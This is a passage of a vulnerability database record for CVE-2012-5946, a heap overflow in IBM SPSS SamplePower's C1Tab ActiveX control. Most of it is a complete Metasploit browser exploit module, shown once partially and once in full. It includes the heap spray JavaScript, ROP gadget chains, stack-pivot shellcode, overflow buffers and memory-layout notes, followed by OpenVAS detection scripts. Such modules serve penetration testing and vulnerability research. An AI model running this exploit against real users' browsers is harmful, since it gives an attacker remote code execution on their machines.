\nreturn objects, target7 \nend \n \n# * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just \n# an object is sufficient to overflow itself and get control execution. \ndef trigger_xp \ntarget = rand_text_alpha(5 + rand(3)) \n \nobjects = %Q| \n<object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n| \nreturn objects, target \nend \n \ndef get_trigger(t) \nif t.name =~ /Windows 7/ \nreturn trigger_w7 \nelsif t.name =~ /Windows XP/ \nreturn trigger_xp \nend \nend \n \ndef load_exploit_html(my_target, cli) \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \nbuf = get_overflow(my_target) \n \nobjects, target_object = get_trigger(my_target) \n \nhtml = %Q| \n<html> \n<head> \n</head> \n<body> \n#{objects} \n<script> \nCollectGarbage(); \n#{js} \n#{target_object}.Caption = \"\"; \n#{target_object}.TabCaption(0) = \"#{buf}\"; \n</script> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n \n[*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test \n \nHeap entries for Segment01 in Heap 01ca0000 \naddress: psize . size flags state (requested size) \n025c0000: 00000 . 00040 [01] - busy (40) \n025c0040: 00040 . 10008 [01] - busy (10000) \n025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer \n025e0050: 10008 . 00048 [01] - busy (40) \n025e0098: 00048 . 00038 [01] - busy (30) \n025e00d0: 00038 . 00038 [01] - busy (30) \n025e0108: 00038 . 00048 [01] - busy (40) \n025e0150: 00048 . 00018 [01] - busy (10) \n025e0168: 00018 . 00018 [01] - busy (10) \n025e0180: 00018 . 00028 [01] - busy (20) \n025e01a8: 00028 . 00018 [01] - busy (10) \n025e01c0: 00018 . 00010 [00] \n025e01d0: 00010 . 00038 [01] - busy (30) \n025e0208: 00038 . 001e8 [01] - busy (1e0) // Vulnerable object \n025e03f0: 001e8 . 001a8 [01] - busy (1a0) \n \n \n[*] Windows XP / ie8 memory layout at oveflow, based on empirical test \n \nHeap entries for Segment01 in Heap 03350000 \naddress: psize . size flags state (requested size) \n03840000: 00000 . 00040 [01] - busy (40) \n03840040: 00040 . 10008 [01] - busy (10000) \n03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer \n03860050: 10008 . 001e8 [01] - busy (1e0) // Vulnerable object \n03860238: 001e8 . 001a8 [01] - busy (1a0) \n038603e0: 001a8 . 00078 [00] \n03860458: 00078 . 00048 [01] - busy (40) \n038604a0: 00048 . 00048 [01] - busy (40) \n038604e8: 00048 . 00618 [01] - busy (610) \n03860b00: 00618 . 10208 [01] - busy (10200) \n03870d08: 10208 . 032f8 [10] \n03874000: 000cc000 - uncommitted bytes. \n \n \n[*] windows 7 / ie8 memory layout at oveflow, based on empirical test \n \n03240000: 00000 . 00040 [101] - busy (3f) \n03240040: 00040 . 10008 [101] - busy (10000) \n03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer \n03260050: 10008 . 00400 [101] - busy (3f8) Internal \n03260450: 00400 . 001a8 [101] - busy (1a0) \n032605f8: 001a8 . 001e8 [101] - busy (1e0) \n032607e0: 001e8 . 001a8 [101] - busy (1a0) \n03260988: 001a8 . 001e8 [101] - busy (1e0) \n03260b70: 001e8 . 001a8 [101] - busy (1a0) \n03260d18: 001a8 . 001e8 [101] - busy (1e0) # Our vulnerable object, target7, seems reliable according to testing \n03260f00: 001e8 . 001a8 [101] - busy (1a0) \n032610a8: 001a8 . 001e8 [101] - busy (1e0) \n03261290: 001e8 . 001a8 [101] - busy (1a0) \n03261438: 001a8 . 001e8 [101] - busy (1e0) \n03261620: 001e8 . 001a8 [101] - busy (1a0) \n032617c8: 001a8 . 001e8 [101] - busy (1e0) \n \n[*] Overflow: \n \n.text:100146E1 push eax ; lpString2 \n.text:100146E2 push CaptionlpBuffer ; lpString1 \n.text:100146E8 call ds:lstrcatA ; Heap Overflow when setting a new CaptionString > 0x10000 \n \n[*] Get Control after overflow: \n \n.text:1001A40D call overflow_sub_1001469E ; Overflow happens here \n.text:1001A412 mov ecx, edi ; edi points to the overflowed object, then ecx (this) \n.text:1001A414 call get_control_sub_100189EC ; Get profit from the overflowed object here \n \n.text:100189EC get_control_sub_100189EC proc near ; CODE XREF: sub_1001A1A9+B6p \n.text:100189EC ; SetTabCaption_sub_1001A2EC+128p ... \n.text:100189EC \n.text:100189EC var_4 = dword ptr -4 \n.text:100189EC \n.text:100189EC push ebp \n.text:100189ED mov ebp, esp \n.text:100189EF push ecx \n.text:100189F0 mov eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled \n.text:100189F3 and [ebp+var_4], 0 \n.text:100189F7 test eax, eax \n.text:100189F9 jz short locret_10018A23 \n.text:100189FB mov ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled \n.text:100189FD lea edx, [ebp+var_4] \n.text:10018A00 push edx \n.text:10018A01 push offset unk_1002B628 \n.text:10018A06 push eax \n.text:10018A07 call dword ptr [ecx] # woot! \n \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121760/ibm_spss_c1sizer.rb.txt"}], "metasploit": [{"lastseen": "2020-10-12T22:57:39", "description": "This module exploits a heap based buffer overflow in the C1Tab ActiveX control, while handling the TabCaption property. The affected control can be found in the c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 SP1.\n", "published": "2013-05-26T05:21:20", "type": "metasploit", "title": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IBM_SPSS_C1SIZER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"6.0\",\n # :ua_maxver => \"8.0\",\n # :javascript => true,\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => NormalRanking,\n # :classid => \"{24E04EBF-014D-471F-930E-7654B1193BA9}\",\n # :method => \"TabCaption\"\n #})\n\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow\",\n 'Description' => %q{\n This module exploits a heap based buffer overflow in the C1Tab ActiveX control,\n while handling the TabCaption property. The affected control can be found in the\n c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has\n been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7\n SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alexander Gavrun', # Vulnerability discovery\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2012-5946' ],\n [ 'OSVDB', '92845' ],\n [ 'BID', '59559' ],\n [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ],\n [ 'ZDI', '13-100' ]\n ],\n 'Payload' =>\n {\n 'Space' => 991,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39\n [ 'Automatic', {} ],\n [ 'IE 6 on Windows XP SP3',\n {\n 'Offset' => '0x5F4',\n 'Ret' => 0x0c0c0c08\n }\n ],\n [ 'IE 7 on Windows XP SP3',\n {\n 'Offset' => '0x5F4',\n 'Ret' => 0x0c0c0c08\n }\n ],\n [ 'IE 8 on Windows XP SP3',\n {\n 'Offset' => '0x5f4',\n 'Ret' => 0x0c0c0c0c,\n 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret\n }\n ],\n [ 'IE 8 on Windows 7',\n {\n 'Offset' => '0x5f4',\n 'Ret' => 0x0c0c0c0c,\n 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-04-26',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n print_status(\"target not found #{agent}\")\n return nil\n end\n\n def ie_heap_spray(my_target, p)\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\n randnop = rand_text_alpha(rand(100) + 1)\n\n # Land the payload at 0x0c0c0c0c\n # For IE 6, 7, 8\n js = %Q|\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n while (nops.length < 0x80000) nops += nops;\n var offset = nops.substring(0, #{my_target['Offset']});\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n heap_obj.gc();\n for (var i=1; i < 0x300; i++) {\n heap_obj.alloc(block);\n }\n |\n\n js = heaplib(js, {:noobfu => true})\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n return js\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def rop_chain\n # gadgets from c1sizer.ocx\n rop_gadgets =\n [\n 0x0c0c0c10,\n 0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack\n 0x100076f1, # pop eax # ret\n 0x10029134, # &VirtualAllox\n 0x1001b41e, # jmp [eax]\n 0x0c0c0c34, # ret address\n 0x0c0c0c0c,\t# lpAddress\n 0x00001000, # dwSize\n 0x00001000, # flAllocationType\n 0x00000040 # flProtect\n ].pack(\"V*\")\n\n return rop_gadgets\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n # No rop. Just return the payload.\n\n if (t.name =~ /IE 6/ or t.name =~ /IE 7/)\n fake_memory = [\n 0x0c0c0c10,\n 0x0c0c0c14\n ].pack(\"V*\")\n return fake_memory + code\n end\n\n return rop_chain + stack_pivot + code\n end\n\n # Objects filling aren't randomized because\n # this combination make exploit more reliable.\n def fake_object(size)\n object = \"B\" * 8 # metadata\n object << \"D\" * size # fake object\n return object\n end\n\n def stack_pivot\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n return pivot\n end\n\n # Check the memory layout documentation at the end of the module\n def overflow_xp\n buf = rand_text_alpha(0x10000)\n # Start to overflow\n buf << fake_object(0x40)\n buf << fake_object(0x30)\n buf << fake_object(0x30)\n buf << fake_object(0x40)\n buf << fake_object(0x10)\n buf << fake_object(0x10)\n buf << fake_object(0x20)\n buf << fake_object(0x10)\n buf << fake_object(0x30)\n buf << \"B\" * 0x8 # metadata chunk\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\n end\n\n # Check the memory layout documentation at the end of the module\n def overflow_xp_ie8\n buf = [\n junk, # padding\n 0x1001b557, # pop eax # c1sizer.ocx\n 0x0c0c0c14, # eax\n 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap\n ].pack(\"V*\")\n buf << rand_text_alpha(0x10000-16)\n # Start to overflow\n buf << \"B\" * 0x8 # metadata chunk\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\n end\n\n # Check the memory layout documentation at the end of the module\n def overflow_w7\n buf = [\n junk, # padding\n 0x1001b557, # pop eax # c1sizer.ocx\n 0x0c0c0c14, # eax\n 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap\n ].pack(\"V*\")\n buf << rand_text_alpha(0x10000-16)\n # Start to oveflow\n buf << fake_object(0x3f8)\n buf << fake_object(0x1a0)\n buf << fake_object(0x1e0)\n buf << fake_object(0x1a0)\n buf << fake_object(0x1e0)\n buf << fake_object(0x1a0)\n buf << \"B\" * 0x8 # metadata chunk\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\n end\n\n def get_overflow(t)\n if t.name =~ /Windows 7/\n return overflow_w7\n elsif t.name =~ /Windows XP/ and t.name =~ /IE 8/\n return overflow_xp_ie8\n elsif t.name =~ /Windows XP/\n return overflow_xp\n end\n end\n\n # * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer.\n # * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer.\n # * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the\n # TabCaption property.\n def trigger_w7\n target = rand_text_alpha(5 + rand(3))\n target2 = rand_text_alpha(5 + rand(3))\n target3 = rand_text_alpha(5 + rand(3))\n target4 = rand_text_alpha(5 + rand(3))\n target5 = rand_text_alpha(5 + rand(3))\n target6 = rand_text_alpha(5 + rand(3))\n target7 = rand_text_alpha(5 + rand(3))\n target8 = rand_text_alpha(5 + rand(3))\n target9 = rand_text_alpha(5 + rand(3))\n target10 = rand_text_alpha(5 + rand(3))\n target11 = rand_text_alpha(5 + rand(3))\n target12 = rand_text_alpha(5 + rand(3))\n target13 = rand_text_alpha(5 + rand(3))\n target14 = rand_text_alpha(5 + rand(3))\n target15 = rand_text_alpha(5 + rand(3))\n\n objects = %Q|\n <object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target2}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target3}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target4}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target5}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target6}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target7}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target8}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target9}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target10}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target11}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target12}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target13}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target14}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n <object id=\"#{target15}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n |\n return objects, target7\n end\n\n # * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just\n # an object is sufficient to overflow itself and get control execution.\n def trigger_xp\n target = rand_text_alpha(5 + rand(3))\n\n objects = %Q|\n <object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\n |\n return objects, target\n end\n\n def get_trigger(t)\n if t.name =~ /Windows 7/\n return trigger_w7\n elsif t.name =~ /Windows XP/\n return trigger_xp\n end\n end\n\n def load_exploit_html(my_target, cli)\n p = get_payload(my_target, cli)\n js = ie_heap_spray(my_target, p)\n buf = get_overflow(my_target)\n\n objects, target_object = get_trigger(my_target)\n\n html = %Q|\n <html>\n <head>\n </head>\n <body>\n #{objects}\n <script>\n CollectGarbage();\n #{js}\n #{target_object}.Caption = \"\";\n #{target_object}.TabCaption(0) = \"#{buf}\";\n </script>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n # Avoid the attack if no suitable target found\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n\n\n=begin\n\n[*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test\n\n Heap entries for Segment01 in Heap 01ca0000\n address: psize . size flags state (requested size)\n 025c0000: 00000 . 00040 [01] - busy (40)\n 025c0040: 00040 . 10008 [01] - busy (10000)\n 025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer\n 025e0050: 10008 . 00048 [01] - busy (40)\n 025e0098: 00048 . 00038 [01] - busy (30)\n 025e00d0: 00038 . 00038 [01] - busy (30)\n 025e0108: 00038 . 00048 [01] - busy (40)\n 025e0150: 00048 . 00018 [01] - busy (10)\n 025e0168: 00018 . 00018 [01] - busy (10)\n 025e0180: 00018 . 00028 [01] - busy (20)\n 025e01a8: 00028 . 00018 [01] - busy (10)\n 025e01c0: 00018 . 00010 [00]\n 025e01d0: 00010 . 00038 [01] - busy (30)\n 025e0208: 00038 . 001e8 [01] - busy (1e0) // Vulnerable object\n 025e03f0: 001e8 . 001a8 [01] - busy (1a0)\n\n\n[*] Windows XP / ie8 memory layout at oveflow, based on empirical test\n\n Heap entries for Segment01 in Heap 03350000\n address: psize . size flags state (requested size)\n 03840000: 00000 . 00040 [01] - busy (40)\n 03840040: 00040 . 10008 [01] - busy (10000)\n 03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer\n 03860050: 10008 . 001e8 [01] - busy (1e0) // Vulnerable object\n 03860238: 001e8 . 001a8 [01] - busy (1a0)\n 038603e0: 001a8 . 00078 [00]\n 03860458: 00078 . 00048 [01] - busy (40)\n 038604a0: 00048 . 00048 [01] - busy (40)\n 038604e8: 00048 . 00618 [01] - busy (610)\n 03860b00: 00618 . 10208 [01] - busy (10200)\n 03870d08: 10208 . 032f8 [10]\n 03874000: 000cc000 - uncommitted bytes.\n\n\n[*] windows 7 / ie8 memory layout at oveflow, based on empirical test\n\n 03240000: 00000 . 00040 [101] - busy (3f)\n 03240040: 00040 . 10008 [101] - busy (10000)\n 03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer\n 03260050: 10008 . 00400 [101] - busy (3f8) Internal\n 03260450: 00400 . 001a8 [101] - busy (1a0)\n 032605f8: 001a8 . 001e8 [101] - busy (1e0)\n 032607e0: 001e8 . 001a8 [101] - busy (1a0)\n 03260988: 001a8 . 001e8 [101] - busy (1e0)\n 03260b70: 001e8 . 001a8 [101] - busy (1a0)\n 03260d18: 001a8 . 001e8 [101] - busy (1e0) # Our vulnerable object, target7, seems reliable according to testing\n 03260f00: 001e8 . 001a8 [101] - busy (1a0)\n 032610a8: 001a8 . 001e8 [101] - busy (1e0)\n 03261290: 001e8 . 001a8 [101] - busy (1a0)\n 03261438: 001a8 . 001e8 [101] - busy (1e0)\n 03261620: 001e8 . 001a8 [101] - busy (1a0)\n 032617c8: 001a8 . 001e8 [101] - busy (1e0)\n\n[*] Overflow:\n\n.text:100146E1 push eax ; lpString2\n.text:100146E2 push CaptionlpBuffer ; lpString1\n.text:100146E8 call ds:lstrcatA ; Heap Overflow when setting a new CaptionString > 0x10000\n\n[*] Get Control after overflow:\n\n.text:1001A40D call overflow_sub_1001469E ; Overflow happens here\n.text:1001A412 mov ecx, edi ; edi points to the overflowed object, then ecx (this)\n.text:1001A414 call get_control_sub_100189EC ; Get profit from the overflowed object here\n\n.text:100189EC get_control_sub_100189EC proc near ; CODE XREF: sub_1001A1A9+B6\u0019p\n.text:100189EC ; SetTabCaption_sub_1001A2EC+128\u0019p ...\n.text:100189EC\n.text:100189EC var_4 = dword ptr -4\n.text:100189EC\n.text:100189EC push ebp\n.text:100189ED mov ebp, esp\n.text:100189EF push ecx\n.text:100189F0 mov eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled\n.text:100189F3 and [ebp+var_4], 0\n.text:100189F7 test eax, eax\n.text:100189F9 jz short locret_10018A23\n.text:100189FB mov ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled\n.text:100189FD lea edx, [ebp+var_4]\n.text:10018A00 push edx\n.text:10018A01 push offset unk_1002B628\n.text:10018A06 push eax\n.text:10018A07 call dword ptr [ecx] # woot!\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ibm_spss_c1sizer.rb"}], "openvas": [{"lastseen": "2017-12-21T11:38:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0593", "CVE-2012-5947", "CVE-2012-5946", "CVE-2012-5945"], "description": "This host is installed with IBM SPSS SamplePower and is prone\n to multiple vulnerabilities.", "modified": "2017-12-20T00:00:00", "published": "2013-05-08T00:00:00", "id": "OPENVAS:803398", "href": "http://plugins.openvas.org/nasl.php?oid=803398", "type": "openvas", "title": "IBM SPSS SamplePower Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_spss_mult_vuln.nasl 8194 2017-12-20 11:29:51Z cfischer $\n#\n# IBM SPSS SamplePower Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:spss_samplepower\";\n\ntag_impact = \"Successful exploitation could allow remote attackers to execute arbitrary\n code in the context of the application using the ActiveX control. Failed\n attempts will likely result in denial of service conditions.\n Impact Level: System/Application\";\n\ntag_affected = \"IBM SPSS SamplePower version 3.0 and prior\";\ntag_insight = \"Multiple flaws due to,\n - Unspecified error in the vsflex7l ActiveX control.\n - Unspecified flaw in the olch2x32 ActiveX control.\n - Error when handling the 'ComboList' or 'ColComboList' in Vsflex8l\n ActiveX control.\n - Error when handling the 'TabCaption' buffer in c1sizer ActiveX control.\";\ntag_solution = \"Upgrade to IBM SPSS SamplePower version 3.0 FP1 (3.0.0.1) or later,\n For updates refer to http://www.ibm.com\";\ntag_summary = \"This host is installed with IBM SPSS SamplePower and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(803398);\n script_version(\"$Revision: 8194 $\");\n script_cve_id(\"CVE-2012-5947\", \"CVE-2012-5946\", \"CVE-2012-5945\", \"CVE-2013-0593\");\n script_bugtraq_id(59556, 59559, 59557, 59527);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 12:29:51 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-08 11:50:37 +0530 (Wed, 08 May 2013)\");\n script_name(\"IBM SPSS SamplePower Multiple Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53234\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/support/docview.wss?uid=swg21635476\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/support/docview.wss?uid=swg21635515\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/support/docview.wss?uid=swg21635511\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/support/docview.wss?uid=swg21635503\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ibm_spss_sample_power_detect_win.nasl\");\n script_mandatory_keys(\"IBM/SPSS/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Check for IBM SPSS SamplePower 3.0.0 or prior\nif( version_is_less_equal( version:vers, test_version:\"3.0.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"3.0 FP1 (3.0.0.1)\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0593", "CVE-2012-5947", "CVE-2012-5946", "CVE-2012-5945"], "description": "This host is installed with IBM SPSS SamplePower and is prone\n to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2013-05-08T00:00:00", "id": "OPENVAS:1361412562310803398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803398", "type": "openvas", "title": "IBM SPSS SamplePower Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM SPSS SamplePower Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:spss_samplepower\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803398\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2012-5947\", \"CVE-2012-5946\", \"CVE-2012-5945\", \"CVE-2013-0593\");\n script_bugtraq_id(59556, 59559, 59557, 59527);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n 